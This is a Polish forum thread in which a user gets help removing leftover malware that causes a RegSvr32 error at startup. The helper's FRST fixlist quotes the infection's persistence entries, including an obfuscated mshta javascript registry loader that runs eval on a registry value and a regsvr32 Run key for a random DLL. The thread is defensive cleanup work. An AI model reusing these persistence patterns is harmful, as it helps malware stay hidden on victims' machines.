Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

RegSvr32 - Nie można załadować modułu

Makromaress 03 Sty 2017 17:43 384 6
  • #1 03 Sty 2017 17:43
    Makromaress
    Poziom 2  

    Miałem problem ze złośliwym oprogramowaniem, którego jak mi się wydaje pozbyłem się już na dobre programami "Malwarebytes Anti-Malware" oraz "Adwcleaner", jednak borykam się z następującym błędem, który wyświetla się zaraz po włączeniu komputera. W załączniku dodaję FRST i Addition. Bardzo proszę o szybką pomoc.

    RegSvr32 - Nie można załadować modułu

    0 6
  • #2 03 Sty 2017 20:06
    Kolobos
    Spec od komputerów

    Wiesz co to za programy?
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AsDesktop.scf [2016-06-12] ()
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Dtella.lnk [2017-01-03]
    ShortcutTarget: Dtella.lnk -> C:\Program Files (x86)\Dtella@MS\dtella.exe ()
    Startup: C:\Users\Makromaress\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dtella.lnk [2017-01-03]

    Wykonaj Fixlist.txt dla FRST:
    Task: {468CD1E0-DF9E-4107-9120-8DE0FE611B3E} - System32\Tasks\{BAAD51CF-1018-489C-B3CB-C04902D70FC1} => pcalua.exe -a "D:\Alice Madness Returns\Alice2\Binaries\Win32\AliceMadnessReturns.exe" -d "D:\Alice Madness Returns\Alice2\Binaries\Win32"
    Task: {9D32EBFC-0597-4ED9-98E8-11FA09A1C4C4} - System32\Tasks\Drickbokerther Center => C:\Program Files (x86)\Mapukthwaing\zzuse.exe [2017-01-03] (Glarysoft Ltd)
    HKU\.DEFAULT\Software\Classes\1ae4ff: "C:\WINDOWS\system32\mshta.exe" "javascript:eFcuYxv26="Zp";q1r=new ActiveXObject("WScript.Shell");Vc06GWM="emk";Xl2BK=q1r.RegRead("HKCU\\software\\gsxeojux\\xleh");d1ywdE="6XASc";eval(Xl2BK);omDo0kF="RKWygw";" <===== UWAGA
    Hosts:
    HKU\S-1-5-21-5925450-3699367662-2612239962-1001\...\Run: [AZworks] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Makromaress\AppData\Local\Evktion\sjcrylwg.dll
    HKU\S-1-5-21-5925450-3699367662-2612239962-1001\...\RunOnce: [Uninstall C:\Users\Makromaress\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Makromaress\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64"
    HKU\S-1-5-21-5925450-3699367662-2612239962-1001\...\RunOnce: [Uninstall C:\Users\Makromaress\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Makromaress\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1"
    HKU\S-1-5-21-5925450-3699367662-2612239962-1001\Software\Microsoft\Internet Explorer\Main,Start Page =
    SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
    R2 Gufetnegury; C:\Program Files (x86)\Mapukthwaing\HggEng.dll [179200 2017-01-03] () [Brak podpisu cyfrowego]
    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
    S5 WinDivert1.1; <===== UWAGA: Zablokowana usługa
    2017-01-03 02:57 - 2017-01-03 14:54 - 00000000 ____D C:\Users\Makromaress\AppData\Local\Ipsoft
    2017-01-03 02:56 - 2017-01-03 02:56 - 00000000 ____D C:\Program Files (x86)\Gezetainghajaied Nodifier
    2017-01-03 02:55 - 2017-01-03 02:56 - 00000000 ____D C:\Program Files (x86)\Mapukthwaing
    2017-01-03 02:55 - 2017-01-03 02:55 - 03977168 _____ C:\Users\Makromaress\Downloads\adwcleaner_6.041.exe
    2017-01-03 02:55 - 2017-01-03 02:55 - 00006136 _____ C:\WINDOWS\System32\Tasks\Drickbokerther Center
    2017-01-03 02:53 - 2017-01-03 02:53 - 00000000 _____ C:\TOSTACK
    2017-01-03 02:52 - 2017-01-03 14:54 - 00000000 ____D C:\Users\Makromaress\AppData\Local\Evktion
    2017-01-03 02:52 - 2017-01-03 02:52 - 00000004 _____ C:\Users\Makromaress\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
    2017-01-03 17:05 - 2016-06-22 22:54 - 00000000 ____D C:\AdwCleaner
    2016-12-13 19:08 - 2016-07-05 14:52 - 00000080 _____ C:\Users\Makromaress\AppData\Local剜捯獫慴⁲慇敭屳呇⁁屖湥楴汴浥湥⹴湩潦
    2017-01-03 02:52 - 2017-01-03 02:52 - 0000004 _____ () C:\Users\Makromaress\AppData\Roaming\4E9225DA0A29463E8AD95A233536E924.dat
    EmptyTemp:


    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    oraz http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • #3 03 Sty 2017 20:36
    Makromaress
    Poziom 2  

    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AsDesktop.scf [2016-06-12] ()
    to nie mam pojęcia co to jest, a dtella to programik służący do przeglądania sieci akademickiej, ok zrobię jak poleciłeś i dam logi za moment

    0
  • #4 03 Sty 2017 20:53
    Kolobos
    Spec od komputerów

    Moze to to:
    11. MISSING DESKTOP ICON IN QUICK LAUNCH

    Type the following lines in Notepad as it is and save the file asDesktop.scf
    [Shell]
    Common=2
    IconFile=Explorer.exe
    [Taskbar]
    Common=Toggle Desktop

    Zobacz czy masz w pliku AsDesktop.scf to co jest podane.

    0
  • #5 03 Sty 2017 21:50
    Makromaress
    Poziom 2  

    problem raczej rozwiązany, antywirusy nic nie wykrywają, błąd nie wyskakuje. Odnośnie tego pliku to nie bardzo wiem co mam sprawdzić, jak go próbuję otworzyć to zrzuca mnie na pulpit (pewnie robię jakąś oczywistą głupotę, ale nie bardzo wiem jak mam go "sprawdzić")

    0
  • Pomocny post
    #6 03 Sty 2017 21:56
    Kolobos
    Spec od komputerów

    Usun katalog C:\FRST i to wszystko.

    0
  • #7 03 Sty 2017 22:12
    Makromaress
    Poziom 2  

    dzięki wielkie! :)

    0